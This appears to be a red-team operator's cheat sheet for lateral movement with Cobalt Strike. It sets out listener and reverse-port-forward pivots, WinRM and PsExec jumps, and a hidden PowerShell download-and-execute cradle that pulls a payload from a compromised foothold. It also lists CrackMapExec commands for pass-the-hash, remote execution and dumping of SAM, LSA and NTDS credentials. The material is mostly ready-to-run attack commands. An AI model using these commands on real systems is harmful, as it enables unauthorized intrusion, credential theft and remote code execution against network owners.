# Cobalt Strike

## Lateral Movement

### Initial Access

Use an HTTP listener and Scripted Web Delivery for the initial foothold.

### General Lateral Movement

Set up an SMB listener and use it when moving with the jump command. SMB beacons link back through the existing beacon over named pipes, so the new host never needs its own route to the teamserver.

### HTTP Shells

* Set up an HTTP listener
  * HTTP Hosts is the first target compromised (the foothold machine), so later beacons call back to the foothold rather than to the teamserver
  * HTTP Host (Stager) is the same as above
  * HTTP Port (C2) is 443
* On the foothold machine, reverse port forward 443 to the teamserver so that anything hitting the foothold on 443 is relayed to the listener
* From the foothold machine, jump across using that listener
* For further hops, a new listener and a new rportfwd are needed on each machine that cannot talk to the foothold directly; the same pattern repeats one hop deeper each time

```
# On the foothold beacon: relay 443 on the foothold to 443 on the teamserver
rportfwd 443 <teamserver> 443

# Then jump across with the listener whose callback host is the foothold
jump winrm <target> <HTTP listener above>
```

### Double Hop

When going over WinRM or PsExec you may hit the usual double-hop problem: the beacon runs under a network logon whose token cannot be used to authenticate onwards to other hosts. Spawning a fresh beacon on the same host over the SMB listener gives a session that is not tied to that logon.

```
jump psexec 127.0.0.1 SMB

# After this, work from the spawned session rather than the original one
```

### Evil-WinRM

Useful when you need to pipe through a box that you cannot get a beacon on, e.g. one locked down with AppLocker.

* Have the HTTP listener set up as above (named redir here) with its rportfwd in place
* Set up Scripted Web Delivery
  * Local Host = foothold
  * Local Port = 443
  * Listener = redir
  * Type = powershell x64
* Start a SOCKS proxy through the foothold, and point the proxychains config at the same port

```
socks 9051
```

* Use evil-winrm (<https://github.com/Hackplayers/evil-winrm>) through the proxy; quote the username so the shell does not eat the backslash

```
proxychains evil-winrm -i <ip> -u 'Domain\username' -p 'Password'
```

* From that shell, pass the credentials explicitly and launch the scripted web delivery on target2

```
$password = "Password" | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Domain\Username", $password)
Invoke-Command -ComputerName TARGET2 -Credential $cred -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('http://FOOTHOLDIP:443/pivtest'))" }
```

* Keep the WinRM session alive or the beacon dies with it; alternatively migrate the beacon to another process (inject/spawn) so it survives the session closing

### CrackMapExec

<https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference>

```
# SOCKS proxy through the foothold as before; prefix each command with proxychains

# Test login and get hostname
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]

# Pass the hash
crackmapexec smb <IP> -u <username> -H <hash>

# Execute commands
crackmapexec smb <IP> -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]

# Dumps
crackmapexec smb <IP> -u <username> -p <password> [--lsa] [--sam] [--ntds [vss]]
```

### Dll

```
rundll32 C:\beacon.dll,Start
```

### Passing PowerShell creds

```
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Domain\User", $password)
Invoke-Command -ComputerName 192.168.144.197 -Credential $cred -ScriptBlock { whoami }
```

## General Tips

* make_token only takes cleartext passwords; use pth when you only have a hash
* Rubeus asktgt doesn't work so well with the /domain flag set
